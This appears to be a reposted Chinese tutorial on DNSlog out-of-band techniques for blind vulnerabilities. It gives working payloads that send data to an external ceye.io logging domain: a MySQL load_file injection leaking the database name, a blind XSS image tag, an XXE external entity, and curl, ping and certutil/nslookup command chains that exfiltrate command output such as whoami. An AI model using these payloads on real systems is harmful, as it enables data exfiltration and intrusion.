zoukankan      html  css  js  c++  java

  • jQuery火箭图标返回顶部代码

    原作者:afanti

    原出处:https://www.cnblogs.com/afanti/p/8047530.html

    0x00 简介

    测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,我们可以通过设置ip代理池解决。

    但是盲注往往效率很低,所以产生了DNSlog注入。具体原理如下:

    首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了,图示如下。

    DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息
    简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息。

    这样说原理很抽象,下面通过实际例子看下。

    http://ceye.io 这是一个免费的记录dnslog的平台,我们注册后到控制面板会给你一个二级域名:xxx.ceye.io,当我们把注入信息放到三级域名那里,后台的日志会记录下来

    0x01 SQL盲注

    就以sql盲注为例。深入理解下DNSlog注入过程:

    通过DNSlog盲注需要用的load_file()函数,所以一般得是root权限。

    show variables like '%secure%';查看load_file()可以读取的磁盘。

    1、当secure_file_priv为空,就可以读取磁盘的目录。
2、当secure_file_priv为G:,就可以读取G盘的文件。
3、当secure_file_priv为null,load_file就不能加载文件。

    通过设置my.ini来配置。

    secure_file_priv=""就是可以load_flie任意磁盘的文件。

    在mysql命令行执行:

    select load_file('\\afanti.xxxx.ceye.io\aaa');其中afanti就是要注入的查询语句

    查看平台,dnsLog被记录下来。

    load_file()函数可以通过dns解析请求。

    以sql-labs第五关:

    payload:

    ' and if((select load_file(concat('\\',(select database()),'.xxxxx.ceye.io\abc'))),1,0)-- -+

    执行的sql语句:

    SELECT * FROM users WHERE id='1' and if((select load_file(concat('\\',(select database()),'.xxxxx.ceye.io\abc'))),1,0)

    查看dnslog日志,发现security数据库被查询出来:

    0x02 XSS(无回显)

    通过盲打,让触发者浏览器访问预设至的链接地址,如果盲打成功,会在平台上收到如下的链接访问记录:

    payload:

    ><img src=http://xss.xxxx.ceye.io/aaa>

    让src请求我们的dnslog平台

    0x03 SSRF(无回显)

    payload:

    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>

    0x04 命令执行(无回显)

    当 ping 一个域名时会对其进行一个递归 DNS 查询的过程,这个时候就能在后端获取到 DNS 的查询请求,当命令真正被执行且平台收到回显时就能说明漏洞确实存在。

    linux:
curl http://haha.xxx.ceye.io/`whoami`
ping `whoami`.xxxx.ceye.io

Windows:
ping %USERNAME%.xxx.ceye.io

    也可以通过base64加密传送数据,平台拿到的数据进行base64解密得到命令回显。

    cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.ceye.io && nslookup !FINAL!"
del temp*

    其他的在这个平台上有一些payload。

    0x05 参考链接

    http://foreversong.cn/archives/861

    https://bbs.ichunqiu.com/thread-22002-1-1.html

    http://blog.knownsec.com/2016/06/how-to-scan-and-check-vulnerabilities/
  • 相关阅读:
    c#构造函数对string类型赋初值
    个人计算机管理
    .net Core2建立MVC网站,部署
    运行或开发.NET Core 的先决条件(支持项目、依赖项)
    在Windows下不使用密码远程登陆Linux
    在Linux下不使用密码远程登陆其他Linux
    如何查看MySQL中每张表占用的空间大小
    pdo如何防止 sql注入
    受教了,memcache比较全面点的介绍,受益匪浅,适用memcached的业务场景有哪些?memcached的cache机制是怎样的?在设计应用时,可以通过Memcached缓存那些内容?
    LVS原理详解及部署之二:LVS原理详解(3种工作方式8种调度算法)
  • 原文地址:https://www.cnblogs.com/-mo-/p/11672141.html
Copyright © 2011-2022 走看看